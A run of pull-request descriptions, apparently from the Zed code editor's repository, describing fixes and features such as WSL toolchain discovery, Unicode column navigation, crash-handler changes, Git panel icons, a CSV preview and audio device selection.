This PR updates the pet dependency to incorporate performance
improvements from upstream.
Related Upstream Changes:
- Issue: microsoft/python-environment-tools#369
- PR: microsoft/python-environment-tools#370
Updating pet reduces toolchain discovery time in WSL environments,
specifically when Conda is installed on the host Windows system. In my
testing, the time from clicking the toolchain button to the list
appearing was reduced by approximately 2 seconds.
While this is a notable improvement, discovery in WSL remains slightly
slower than in native development or remote Linux environments, where
toolchains are typically loaded near-instantaneously.
Before you mark this PR as ready for review, make sure that you have:
- [x] Added a solid test coverage and/or screenshots from doing manual
testing (no need)
- [x] Done a self-review taking into account security and performance
aspects
- [x] Aligned any UI changes with the [UI
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- Improved python toolchain discovery under WSL environment
- Selection/focus improvements (reduces flickers, move selection more
correctly throughout the list)
- Adds open folder button in the sidebar header
- Fixes sidebar header design, including the thread view one, too
- Fixes behavior of cmd-n when focused in the sidebar
- Changes the design for the "new thread" button in the sidebar and adds
a preview of the prompt on it
- Rename items in the "start thread in" dropdown
Release Notes:
- N/A
---------
Co-authored-by: cameron <cameron.studdstreet@gmail.com>
This PR bumps the version of the GLSL extension to v0.2.2.
Release Notes:
- N/A
Co-authored-by: zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>
Closes#43329
## Summary
This fixes `path:line:column` navigation for files containing non-ASCII
text.
Before this change, open path flows were passing the external column
directly into `go_to_singleton_buffer_point`. That happened to work for
ASCII, but it was wrong for Unicode because external columns are
user-visible character positions while the editor buffer stores columns
as UTF-8 byte offsets.
This PR adds a shared text layer conversion for external row/column
coordinates and uses it in the affected open-path flows:
- file finder navigation
- recent project remote connection navigation
- recent project remote server navigation
It also adds regression coverage for the Unicode case that originally
failed.
As a small - necessary - prerequisite, this also adds
`remote_connection` test support to `file_finder`'s dev-deps so the
local regression test can build and run on this branch. That follows the
same feature mismatch pattern previously fixed in #48280. I wasn't able
to locally verify the tests/etc. w/o the addition... so I've rolled it
into this PR. Tests are green.
The earlier attempt in #47093 was headed in the right direction, but it
did not land and did not include the final regression coverage requested
in review.
## Verification
- `cargo fmt --all -- --check`
- `./script/clippy -p text`
- `./script/clippy -p file_finder`
- `./script/clippy -p recent_projects`
- `cargo test -p file_finder --lib --no-run`
- `cargo test -p file_finder
file_finder_tests::test_row_column_numbers_query_inside_file -- --exact`
- `cargo test -p file_finder
file_finder_tests::test_row_column_numbers_query_inside_unicode_file --
--exact`
- `cargo test -p text
tests::test_point_for_row_and_column_from_external_source -- --exact`
## Manual
I reproduced locally on my machine (macOS) w/ a stateless launch using a
Unicode file (Cyrillic)
Before:
- `:1:5` landed too far left
- `:1:10` landed around the 4th visible Cyrillic character
After:
- `:1:5` lands after 4 visible characters / before the 5th
- `:1:10` lands after 9 visible characters / before the 10th
Release Notes:
- Fixed `path:line:column` navigation so non-ASCII columns land on the
correct character.
---------
Co-authored-by: Kirill Bulatov <kirill@zed.dev>
This PR bumps the version of the HTML extension to v0.3.1.
Release Notes:
- N/A
Co-authored-by: zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>
Closes https://github.com/zed-industries/zed/discussions/49740
Adds optional file and folder icons to the Git panel so its file list is
easier to scan, especially in larger repositories.
- add folder icons for Git panel entries
- add Git panel settings for file and folder icon visibility
---
Release Notes:
- Made the Git Panel aware of icon themes.
- Added the ability to render file type icons in the Git panel.
---------
Co-authored-by: Danilo Leal <daniloleal09@gmail.com>
Closes#51339
This should address issues with too new libstdc++.so on older/more
conservative distros such as RHEL9.
Release Notes:
- Relaxed requirement for libstdc++.so available on Linux distros.
Closes#46307
Before you mark this PR as ready for review, make sure that you have:
- [ ] Added a solid test coverage and/or screenshots from doing manual
testing
- [X] Done a self-review taking into account security and performance
aspects
- [ ] Aligned any UI changes with the [UI
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- Improved compatibility with mounted VHDs on Windows.
---------
Co-authored-by: John Tur <john-tur@outlook.com>
Follow up to https://github.com/zed-industries/zed/pull/51384
This PR fixes the settings UI rendering of this setting by adding a
default value and also wraps it in the feature flag (only the settings
UI rendering), given it's not widely available just yet.
Release Notes:
- N/A
This PR bumps the version of the GLSL extension to v0.2.1.
Release Notes:
- N/A
Co-authored-by: zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>
This will allow us to also use the workflows for this repository, which
will especially come in handy once we revisit provider extensions.
Not perfect, as we will trigger some failed workflows for extensions
that were just added
Release Notes:
- N/A
* [x] Put back persistence of sidebar open state
* [x] when agent panel is docked right, put sidebar on the right side
* [x] remove stale entries from `SidebarsByWindow`
Release Notes:
- N/A
---------
Co-authored-by: Eric Holk <eric@zed.dev>
Co-authored-by: Mikayla Maki <mikayla.c.maki@gmail.com>
Co-authored-by: Anthony Eid <hello@anthonyeid.me>
String panics are a non-trivial percentage of the crashes we see at Zed,
and
doubly unfortunately they may incidentally include the contents of a
user's
buffer.
Although this hasn't happened yet (to my knowledge), I don't want to be
in the position of having received sensitive information this way.
See also https://github.com/rust-lang/rust/pull/153677
Release Notes:
- N/A
This PR makes the "Open Project" button in the sidebar also open the
"Recent Projects" popover, while also anchoring that popover to the the
button on the sidebar instead.
Release Notes:
- N/A
This will help with test times (in some cases), as nextest cannot figure
out whether a given rdep is actually an alive edge of the build graph
Closes #ISSUE
Before you mark this PR as ready for review, make sure that you have:
- [ ] Added a solid test coverage and/or screenshots from doing manual
testing
- [ ] Done a self-review taking into account security and performance
aspects
- [ ] Aligned any UI changes with the [UI
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- N/A
This adds checks to the extension CLI to ensure that tasks and semantic
token rules are actually valid for the compiled extensions.
Release Notes:
- N/A
- Make clicking on the project header collapse/expand the group as
opposed to activating the workspace
- Added the "threads" label close to the sidebar toggle button
- Made the open folder icon button open the file finder directly as
opposed to the recent projects popover
Release Notes:
- N/A
Before you mark this PR as ready for review, make sure that you have:
- [x] Added a solid test coverage and/or screenshots from doing manual
testing
- [x] Done a self-review taking into account security and performance
aspects
- [x] Aligned any UI changes with the [UI
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- N/A
---------
Co-authored-by: Eric <eric@zed.dev>
Co-authored-by: cameron <cameron.studdstreet@gmail.com>
Co-authored-by: Danilo Leal <daniloleal09@gmail.com>
Co-authored-by: Anthony Eid <anthony@zed.dev>
Co-authored-by: John Tur <john-tur@outlook.com>
Closes#50170.
Before you mark this PR as ready for review, make sure that you have:
- [x] Added a solid test coverage and/or screenshots from doing manual
testing
- [x] Done a self-review taking into account security and performance
aspects
- [x] Aligned any UI changes with the [UI
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- Enable parser options individually to avoid rendering issues
Before this change the crash handler uploaded crashes before sign-in had
happened.
Now we get the metrics_id correctly. This allows for us to tie crashes
reported
on Github to users who have opted into telemetry (users who have opted
into
crash reporting but not telemetry will not have a metrics_id).
Release Notes:
- Fixed crash reporter metadata collection
---------
Co-authored-by: Miguel Raz Guzmán Macedo <miguel@zed.dev>
Follow up on: https://github.com/zed-industries/zed/pull/49519
This PR reworks how Zed calculates diff num stats by moving the
calculation to the `RepositorySnapshot` layer, instead of the
`GitPanel`. This has a couple of benefits:
1. Snapshot recalculations are already set up to recompute on file
system changes and only update the affected files. This means that diff
stats don't need to manage their own subscription or states anymore like
they did in the original PR.
2. We're able to further separate the data layer from the UI. Before,
the git panel owned all the subscriptions and tasks that refreshed the
diff stat, now the repository does, which is more inline with the code
base.
3. Integration tests are cleaner because `FakeRepository` can handle all
the data and calculations of diff stat and make it accessible to more
tests in the codebase. Because a lot of tests wouldn't initialize the
git panel when they used the git repository.
4. This made implementing remote/collab support for this feature
streamline. Remote clients wouldn't get the same buffer events as local
clients, so they wouldn't know that the diff stat state has been updated
and invalidate their data.
5. File system changes that happened outside of Zed now trigger the diff
stat refresh because we're using the `RepositorySnapshot`.
I added some integration tests as well to make sure collab support is
working this time. Finally, adding the initial diff calculation to
`compute_snapshot` didn't affect performance for me when checking
against chromium's diff with HEAD~1000. So this should be a safe change
to make.
I decided to add diff stats on the status entry struct because it made
updating changed paths and the collab database much simpler than having
two separate SumTrees. Also whenever the UI got a file's status it would
check its diff stat as well, so this change makes that code more
streamlined as well.
Before you mark this PR as ready for review, make sure that you have:
- [x] Added a solid test coverage and/or screenshots from doing manual
testing.
- [x] Done a self-review taking into account security and performance
aspects.
Release Notes:
- N/A
Closes#50624
The empty bottom section of the project panel showed a horizontal
scrollbar on hover, but scrolling didn't work there. Added a scroll
wheel handler to the blank area that forwards scroll events to the
uniform list's scroll handle, making both horizontal and vertical
scrolling work from anywhere in the panel.
Before you mark this PR as ready for review, make sure that you have:
- [x] Added a solid test coverage and/or screenshots from doing manual
testing
- [x] Done a self-review taking into account security and performance
aspects
- [x] Aligned any UI changes with the [UI
checklist](https://github.com/zedindustries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- Fixed project panel empty area showing a non-functional scrollbar;
scrolling now works from anywhere in the panel
---------
Co-authored-by: MrSubidubi <finn@zed.dev>
Closes#50701
Before you mark this PR as ready for review, make sure that you have:
- [x] Added a solid test coverage and/or screenshots from doing manual
testing
- [x] Done a self-review taking into account security and performance
aspects
- [ ] Aligned any UI changes with the [UI
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- N/A
This is already expected on the cloud side. This lets us know under
which organization the user is logged in when requesting an llm_api
token.
Closes CLO-337
Release Notes:
- N/A
Since the read times always correspond to an action log call anyway, we
can let the action log track this internally, and we don't have to
provide a reference to the Thread in as many tools.
Release Notes:
- N/A
---------
Co-authored-by: Bennet Bo Fenner <bennetbo@gmx.de>
Co-authored-by: MrSubidubi <dev@bahn.sh>
Release Notes:
- Windows: make auto-update more robust in the face of apps holding the
Zed.exe handle
---------
Co-authored-by: Jakub Konka <kubkon@jakubkonka.com>
## **Description:**
**Context:**
This PR introduces an initial CSV preview feature for Zed, building upon
two previously merged infrastructure PRs:
- [#46341](https://github.com/zed-industries/zed/pull/46341) - Data
table dynamic column support (removed const generics)
- [#46190](https://github.com/zed-industries/zed/pull/46190) - Variable
row height mode for data tables
This implementation is based on the [original draft PR
#44344](https://github.com/zed-industries/zed/pull/44344), which has
been carefully decomposed into smaller, reviewable pieces.
---
#### **Features Included:**
**Core Infrastructure:**
- Live CSV parsing with smart debouncing (200ms cooldown)
- Performance monitoring with built-in timing metrics (not displayed in
UI yet)
- Automatic file change detection and re-parsing
- Support for quoted fields, multiline cells, and escaped characters
**Table Display:**
- Variable row height rendering with fallback to uniform mode
(switchable via settings)
- Draggable column resizing (reusing existing data table infrastructure)
- Row identifiers supporting both source line numbers and sequential row
numbers
- Configurable font rendering (UI font vs monospace)
- Tooltips showing full cell content on hover
**Interactive Features:**
- Column sorting (ascending/descending) with visual indicators
**Settings Panel:**
- Toggle between variable/uniform row rendering
- Font type selection (UI/monospace)
- Row identifier type configuration
- Debug information display
- Multiline cell rendering options
---
#### **Features Intentionally Removed for This PR:**
To reduce complexity and review scope, the following features were
temporarily reverted and will be reintroduced in subsequent PRs:
- ❌ Settings pannel with performance metrics overlay
- ❌ Cell selection (single, multiple, and range selections)
- ❌ Keyboard navigation with arrow keys and selection extension
- ❌ Copy functionality supporting CSV, TSV, and Markdown table formats
- ❌ Inline cell editing with file persistence
- ❌ Viewport following for large datasets
- ❌ Column filtering and search capabilities
These removals were done via "time-machine" commits that cleanly nuked
vertical slices of functionality from the complete implementation.
---
**Technical Implementation:**
The feature is organized into a dedicated `csv_preview` crate with the
following structure:
```
crates/csv_preview/
├── src/
│ ├── csv_preview.rs # Main view and coordination logic
│ ├── parser.rs # CSV parsing and editor integration
│ ├── settings.rs # Configuration types and defaults
│ ├── table_data_engine.rs # Data transformation logic
│ ├── renderer/ # UI rendering modules
│ │ ├── preview_view.rs # Main render implementation
│ │ ├── render_table.rs # Table component assembly
│ │ ├── table_cell.rs # Individual cell rendering
│ │ ├── table_header.rs # Header with sorting controls
│ │ └── row_identifiers.rs # Line number column
│ └── types/ # Core data structures
│ ├── table_like_content.rs
│ ├── coordinates.rs # Display vs data coordinate systems
│ └── table_cell.rs
```
**Key architectural decisions:**
- **Dual coordinate system**: Separates data indices from display
indices to support sorting/filtering
- **Component reuse**: Leverages existing `data_table` infrastructure
from the keymap editor
---
**Integration:**
- Registers `csv::OpenPreview` action (currently without default
keybindings)
- Follows the same workspace integration pattern as `markdown_preview`
and `svg_preview`
- Automatically detects `.csv` file extensions
- Tab integration with appropriate icons and naming
---
**Code Structure Note:**
Some code structures, types, and documentation may appear redundant or
over-engineered in this initial implementation. This is intentional -
the feature was developed as a complete system and then decomposed by
functionality rather than being built incrementally. The "extra"
infrastructure supports features that were removed for this PR but will
be reintroduced in subsequent ones.
This approach was chosen over extensive refactoring because:
1. The complete feature took 200+ commits to develop with significant
rewrites
2. Clean extraction of vertical slices was more feasible than rebuilding
incrementally
3. The end state will utilize all these components, making current
"redundancy" temporary
I apologize for any inconvenience this may cause during review, but the
alternative would have required significant refactoring effort just to
make intermediate states "prettier," which seemed counterproductive.
---
**Future Work:**
This lays the groundwork for upcoming PRs that will reintroduce the
removed features:
- Cell selection and keyboard navigation
- Copy functionality with multiple output formats
- Inline editing capabilities with undo/redo
- Column filtering and search
- TSV and other delimiter support
- Improved horizontal scrolling behavior
- Settings persistence
**Testing:**
Includes test fixtures demonstrating multiline cell handling, various
column counts, and edge cases.
---
**Release Notes:**
- N/A This is feature flagged
---------
Co-authored-by: Anthony Eid <anthony@zed.dev>
Closes#48434
In Dev Containers, failed git operations were surfaced with a generic
failure message, while the useful git output (stderr/stdout) was not
reliably available to users.
This happened because in devcontainers the git operation errors go
through an RPC layer and then got wrapped with `anyhow::Context` (e.g.
“sending pull request”); the toast displayed only that outer context via
`to_string()`, masking the underlying git stderr message.
This change ensures the full git operation output is preserved and
surfaced via Zed’s “See logs” flow in Dev Containers, matching the
information you get when running the same git command in a terminal.
### What you should expect in the UI
- You will see a generic toast like “git pull failed” / “git push
failed”.
- When clicking on the toast’s “See logs”, the log tab now contains the
full git error output (e.g. non-fast-forward hints, merge conflict
details, “local changes would be overwritten”, etc.), which previously
could be missing/too generic.
---
## Manual testing
Run inside a Dev Container and ensure git auth works (SSH keys/agent or
HTTPS credentials).
1. **Dirty-tree pull failure**
- Make remote ahead by 1 commit (push from another clone).
- Locally modify the same file without committing.
- In Zed: **Pull**
- **Expect:** toast “git pull failed” + **See logs** shows “local
changes would be overwritten…” (or equivalent).
2. **Non-fast-forward push failure**
- Ensure remote ahead.
- Locally create 1 commit.
- In Zed: **Push**
- **Expect:** toast “git push failed” + **See logs** shows “rejected
(non-fast-forward)” + hint to pull first.
3. **Merge-conflict pull failure**
- Create conflicting commits on the same lines (one local commit, one
remote commit).
- In Zed: **Pull**
- **Expect:** toast “git pull failed” + **See logs** shows conflict
output (“CONFLICT…”, “Automatic merge failed…”).
Release Notes:
- Fixed devcontainer git failure toasts so they show the actual git
error
---------
Co-authored-by: KyleBarton <kjb@initialcapacity.io>
#50176 added `recoverable_panic` to swallow mermaid panics, then #50280
fixed it in upstream. This PR removes the workaround so future panics
reach Sentry. Also bumps `mermaid-rs-renderer` to fix a hex parsing
panic.
Release Notes:
- N/A
Implements a basic web platform for the wasm32-unknown-unknown target
for gpui
Release Notes:
- N/A *or* Added/Fixed/Improved ...
---------
Co-authored-by: John Tur <john-tur@outlook.com>
Paving the way to remove `ExcerptId`. Done in this PR:
- Unshipped the stack trace view
- Get rid of `push_excerpts`
- Get rid of some callers of `remove_excerpts`
We still need to remove some calls to `remove_excerpts` and other APIs,
especially in `randomly_edit_excerpts` and collaboration.
Release Notes:
- The stack trace multibuffer view has been removed.
---------
Co-authored-by: Conrad Irwin <conrad.irwin@gmail.com>
The mermaid renderer can fail to render certain diagrams, and we already
have a fallback for that. It's not worth crashing Zed over it.
Wrapping `catch_unwind` alone doesn't work because our panic hooks
terminate the process before unwinding begins (we intentionally
terminate so the crash handler subprocess can generate a minidump), so
there was no way to gracefully handle panics from third-party code until
now (in rare cases where we need it, like in this case).
To handle this gracefully, we added `crashes::recoverable_panic` which
tells the panic hook to stand down on the current thread so the unwind
can proceed and be caught. This should be used sparingly since caught
panics bypass crash reporting.
Release Notes:
- Fixed a crash when rendering mermaid diagrams in markdown preview.
We don't want to show the sidebar to users if they have `disable_ai`
enabled because it's an AI focused feature. In the future if we add non
AI functionality to the sidebar we'll reenable it.
Before you mark this PR as ready for review, make sure that you have:
- [x] Added a solid test coverage and/or screenshots from doing manual
testing
- [x] Done a self-review taking into account security and performance
aspects
- [x] Aligned any UI changes with the [UI
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- N/A
- Enabled opening the Git Graph, with the corresponding commit detail
drawer open, from the commit view
- Redesigned the commit view's header and toolbar to allow addition of
the Git Graph icon button
- Redesigned icons for the Git Graph and commit view
https://github.com/user-attachments/assets/8efef60a-0893-4752-9b40-838da21ceb54
---
Before you mark this PR as ready for review, make sure that you have:
- [x] Added a solid test coverage and/or screenshots from doing manual
testing
- [x] Done a self-review taking into account security and performance
aspects
- [x] Aligned any UI changes with the [UI
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- N/A (_Git Graph is still feature flagged, so no release notes for
now_)
Closes #ISSUE
Before you mark this PR as ready for review, make sure that you have:
- [x] Added a solid test coverage and/or screenshots from doing manual
testing
- [x] Done a self-review taking into account security and performance
aspects
- [x] Aligned any UI changes with the [UI
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- N/A *or* Added/Fixed/Improved ...
We see a number of crashes in Sentry that appear to be crashes in
wasmtime.
This shouldn't happen, as wasmtime is designed to run untrusted code
"safely".
Looking into this, it seems likely that the problem is that we race with
wasmtime
when installing signal handlers. If wasmtime's handlers are installed
before ours,
then any signals that it intends to handle (like out of bounds memory
access) will
reach our handlers before its; which causes us to assume the app has
crashed.
This changes fixes our crash handler initialization to ensure we always
create
our signal handler first, and reverts a previous attempt to fix this
from #40883
Closes #ISSUE
Before you mark this PR as ready for review, make sure that you have:
- [ ] Added a solid test coverage and/or screenshots from doing manual
testing
- [ ] Done a self-review taking into account security and performance
aspects
- [ ] Aligned any UI changes with the [UI
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- Linux: Fixed crashes that could happen due to our crash handler
erroneously catching signals intended for wasmtime.
- Made hover/active styles, as well as clicks, work for the entire row,
capture the graph element, too (needed to make some manual hover and
other states management to pull that off)
- Used the existing `Chip` component for the branch chip instead of a
local recreation
- Adjusted spacing and sizing of commit detail panel, including button
labels truncation and tooltip content
- Added diff stat numbers for the changed files, to match the commit
view
- Standardized the commit avatar component across the git graph, the
commit view, and the file history view
- Added scrollbar to the changed files uniform list
- Removed author name display redundancy (kept only email)
- Made the commit detail UI have a min-width
<img width="750" height="1964" alt="Screenshot 2026-02-23 at 11 31@2x"
src="https://github.com/user-attachments/assets/d1433bd8-5edb-4829-882b-52b1bffbd6db"
/>
---
Before you mark this PR as ready for review, make sure that you have:
- [x] Added a solid test coverage and/or screenshots from doing manual
testing
- [x] Done a self-review taking into account security and performance
aspects
- [x] Aligned any UI changes with the [UI
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- N/A
---------
Co-authored-by: Anthony Eid <anthony@zed.dev>
Duplicates are defined as cursor positions that have an approximate
Jaccard similarity greater than 0.5 (over token 5-grams).
From the resulting clusters of near-duplicates, we select up to N
examples that are maximally different from each other.
Release Notes:
- N/A
Third attempt to land this improvement: (#45577, #44273)
The previous PR didn’t work on Intel MacBooks because I made a wrong
assumption about the unified memory check. `has_unified_memory` only
tells us that the CPU and GPU share memory. It does not mean we’re
running on an Apple GPU family.
Memoryless textures are only supported on Apple GPUs. Some Intel Macs
report unified memory, but they don’t support memoryless textures, which
is why the previous change failed there.
So instead of relying on unified memory, we now explicitly check that
we’re running on an Apple GPU family before enabling memoryless
textures.
Before you mark this PR as ready for review, make sure that you have:
- [ ] Added a solid test coverage and/or screenshots from doing manual
testing
- [X] Done a self-review taking into account security and performance
aspects
- [ ] Aligned any UI changes with the [UI
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- Reduced memory usage on macOS
---------
Signed-off-by: Marco Mihai Condrache <52580954+marcocondrache@users.noreply.github.com>
Closes#15196, #46918
- fix: notebook_ui, use buffer so that notebooks open in remote/WSL
settings.
- fix: add musl in nix for cross-compilation, without this remote server
doesn't build inside NixOS
Release Notes:
- Implement WSL and SSH remote kernels (crates/repl/src/kernels/*) and
wire up spawn/kill kernel proto messages and client requests.
This PR makes it so the user gets signed out upon receiving an
Unauthorized response when acquiring an LLM token.
This is a re-landing of #49661.
Closes CLO-324.
Release Notes:
- N/A
#2874 on steroids
Before you mark this PR as ready for review, make sure that you have:
- [ ] Added a solid test coverage and/or screenshots from doing manual
testing
- [ ] Done a self-review taking into account security and performance
aspects
- [ ] Aligned any UI changes with the [UI
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- N/A
---------
Co-authored-by: Eric Holk <eric@zed.dev>
This reverts commit 1d66bbe06f.
Needs 2 more fixes:
* enter does not move to the first excerpt anymore
* there could be situations when a narrowed search does not decrease the
excerpt enough to see the result onscreen
Release Notes:
- N/A
This PR adds the `AnnouncementToast` component that we can use whenever
a new version introduces a new and special feature that's worthy of a
flashier announcement. We can pick the specific version we want to
target, and instead of showing the regular "View Release Notes" toast,
we'd show this new one instead.
For now, everything is turned off as we're not sure yet which version we
will be targeting for an upcoming release.
<img width="550" height="1964" alt="Screenshot 2026-02-18 at 9 06@2x"
src="https://github.com/user-attachments/assets/19930b15-261b-416f-992e-6e28447beb27"
/>
Release Notes:
- N/A
Before you mark this PR as ready for review, make sure that you have:
- [ ] Added a solid test coverage and/or screenshots from doing manual
testing
- [ ] Done a self-review taking into account security and performance
aspects
- [ ] Aligned any UI changes with the [UI
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- N/A
This PR updates Collab to make it validate access tokens through Cloud
instead of doing it in-house.
We're reusing the `GET /client/users/me` endpoint—which is what we also
call on the client—to validate the user's access token.
We only need to do this when establishing a WebSocket connection, so the
increased latency of a network hop shouldn't be a problem.
Closes CLO-308.
Release Notes:
- N/A
This PR adds a button in the `git: branch diff` view that allows to
quickly and easily send the entire diff to your last used agent for a
review. What this does is automatically submits a (pre-written and
generic) prompt to the last agents you were using in the agent panel
with the whole content of your diff.
<img width="750" height="1964" alt="Screenshot 2026-02-18 at 3 35@2x"
src="https://github.com/user-attachments/assets/493d8cf4-4815-4b01-91a0-6a39ad6219fe"
/>
Release Notes:
- Added a "Review Branch" button in the `git: branch diff` view so that
the whole diff can be quickly sent for review to an agent.
---------
Co-authored-by: Bennet Bo Fenner <bennetbo@gmx.de>
This PR removes onboarding modals for features that were announced, at
this point, a long time ago: Git v1, Debugger, and Agent Panel v1. This
cleans up the actions list a bit when you search for "onboarding". I
left the ACP and Claude Code ones, though; they were the two more recent
ones, but we should be able to remove them soon enough, too.
Release Notes:
- N/A
Removes the feature flag around listing and loading existing sessions
for external agents.
Release Notes
- acp: Expose session history for all external agents that support it.
Co-authored-by: Bennet Bo Fenner <bennetbo@gmx.de>
Before you mark this PR as ready for review, make sure that you have:
- [ ] Added a solid test coverage and/or screenshots from doing manual
testing
- [x] Done a self-review taking into account security and performance
aspects
- [x] Aligned any UI changes with the [UI
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- N/A
Closes#49067
See https://github.com/zed-industries/notify/pull/2 for more details
Note: notify already fixed this upstream, and I'm planning on using
their crate as our dependency once their v9 is officially released.
Release Notes:
- Fix panic that could occur when navigating external code
This PR removes the `GET /rpc_server_snapshot` endpoint from Collab, as
it is not being used (and also didn't seem to be functional).
Release Notes:
- N/A
This PR removes the `cloud-thinking-effort` feature flag to ship the
thinking effort UI for the Zed provider.
Release Notes:
- Added support for controlling thinking effort levels with supported
models using the Zed provider.
Closes #ISSUE
Before you mark this PR as ready for review, make sure that you have:
- [ ] Added a solid test coverage and/or screenshots from doing manual
testing
- [ ] Done a self-review taking into account security and performance
aspects
- [ ] Aligned any UI changes with the [UI
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
Release Notes:
- N/A *or* Added/Fixed/Improved ...
---------
Co-authored-by: Zed Zippy <234243425+zed-zippy[bot]@users.noreply.github.com>
Closes#45135
Since neither the project search nor file finder search was showing
project's root name, including it in the history was unnecessary,
especially when the user had `project_panel.hide_root` set to `true`.
Release Notes:
- Made file finder to respect `project_panel.hide_root` settings
---------
Co-authored-by: Kirill Bulatov <kirill@zed.dev>
This PR adds the ability to, within the Recent Projects modal/popover,
quickly add a project in the recent projects section to the current
workspace. Note that this is currently limited to local projects only.
https://github.com/user-attachments/assets/6b72af11-9c94-45d3-a7df-76869b942727
Release Notes:
- Workspace: Enabled quickly adding a recent project to the current
workspace.
Closes #N/A (no existing issue - implemented to enable image input for
Bedrock models)
This PR enables the "@" image mention feature for Bedrock models that
support vision capabilities.
**Changes:**
- Added `supports_images()` method to Bedrock `Model` enum
- Wired up image support in the Bedrock language model provider
- Added `MessageContent::Image` handling to convert base64 images to
Bedrock's expected format
- Added tool result image support
**Supported models:** Claude 3/3.5/4 family, Amazon Nova Pro/Lite, Meta
Llama 3.2 Vision, Mistral Pixtral
Release Notes:
- Added image input support for Amazon Bedrock models with vision
capabilities
Remove the `AgentsPanel` (from the `agent_ui_v2` crate) and the utility
pane infrastructure from the codebase.
The Agents Panel was a separate panel gated behind the `agent-v2`
feature flag that was redundant with the existing Agent Panel. Utility
panes were a layout concept (secondary panes next to the editor,
separate from dock panels) whose only consumer was `AgentThreadPane` in
the Agents Panel.
### Changes
- Deleted the entire `agent_ui_v2` crate (`agents_panel.rs`,
`agent_thread_pane.rs`)
- Deleted `workspace/src/utility_pane.rs`
- Removed `UtilityPane`, `UtilityPaneHandle`, `UtilityPanePosition`,
`MinimizePane`, `ClosePane` from `workspace/src/dock.rs`
- Removed all utility pane fields, methods, and render blocks from
`workspace.rs`
- Removed all aside toggle code from `pane.rs` and `pane_group.rs`
- Removed `agents_panel_dock` setting from agent settings and
`default.json`
- Removed all `agent_ui_v2` references from `main.rs`, `zed.rs`, and
Cargo.toml files
- Cleaned up test code in `tool_permissions.rs` and `agent_ui.rs`
Closes AI-17
(No release notes because this was all feature-flagged.)
Release Notes:
- N/A
Release Notes:
- Fixed an issue where a request could fail if an MCP server with names
containing whitespace was used
## Summary
When multiple MCP servers expose tools with the same name, Zed
disambiguates them by prefixing the tool name with the server ID from
settings.json. If the server ID contains spaces or special characters
(e.g., `"Azure DevOps"`), the resulting tool name like `Azure
DevOps_echo` violates Anthropic's API pattern `^[a-zA-Z0-9_-]{1,128}$`,
causing API errors:
> "Received an error from the Anthropic API: tools.0.custom.name: String
should match pattern '^[a-zA-Z0-9_-]{1,128}$'"
## Solution
Convert server IDs to snake_case (using the `heck` crate already
available in the workspace) before using them as prefixes during tool
name disambiguation.
| Server ID in settings.json | Disambiguated Tool Name |
|---------------------------|------------------------|
| `"Azure DevOps"` | `azure_dev_ops_echo` |
| `"My MCP Server"` | `my_mcp_server_echo` |
## Test plan
- [x] Added test case for server name with spaces ("Azure DevOps") in
`test_mcp_tool_truncation`
- [x] Verified existing tests pass
- [x] Manually tested with two MCP servers having overlapping tool names
After (left), Before (right):
<img width="2880" height="1800" alt="Screenshot_20251228_163249"
src="https://github.com/user-attachments/assets/09c4e8f0-e282-4620-9db3-3e2c7d428d15"
/>
🤖 Generated with (some) help from [Claude
Code](https://claude.com/claude-code)
---------
Co-authored-by: Claude Opus 4.5 <noreply@anthropic.com>
Co-authored-by: Bennet Bo Fenner <bennetbo@gmx.de>
This PR adds ability to select and test audio input/output devices for
use in collaboration setting (which is what the team at Zed relies
heavily on). Currently, we only ever used whatever the system default is
and it worked well until it didn't - for some reason, when I am on my
Linux laptop, I am unable to force Zed to use my external mic +
headphones via external USB audio interface. With this PR, now I can
list all available devices and select the one I want.
There are still a couple of caveats that we should be aware of:
* I've decided to list *all* available devices meaning on Linux it is
quite possible that you may discover that what your desktop environment
is reporting to you is a significantly shorter list than what your sound
framework/hw is actually exposing. I think this makes sense given my
inexperience with audio drivers/devices and frameworks on various OSes
so that we get full control over what is available with the goal of
being able to come up with some filtering heuristic as we go along.
* We currently populate the list of available audio devices only once at
startup meaning if you unplug your device while you have Zed running
this will not register until you restart Zed which is a PITA. However,
in order to keep the changes manageable I thought it would be best to do
minimal work in this regard now, and iterate on this some more in the
near future. After all, we don't really monitor device changes on any
platform except macOS anyhow, so it might be the case that when I get
round to implementing this I will have the opportunity to tackle both at
the same time.
* In order to get a valid list of all audio devices using `cpal` crate
(which is the building block of `rodio`), I had to bump `cpal` to 0.17,
and pin `rodio` to a more recent commit sha as a result, so if you see
any regressions, lemme know and/or feel free to revert this PR.
* Finally, I've done my best to integrate this with the settings UI, but
I am sure more could be done in terms of styling, etc.
Some screenshots:
<img width="1152" height="949" alt="Screenshot From 2026-02-12 11-40-04"
src="https://github.com/user-attachments/assets/e147c153-1902-49d6-bf68-3ac317a6a7b0"
/>
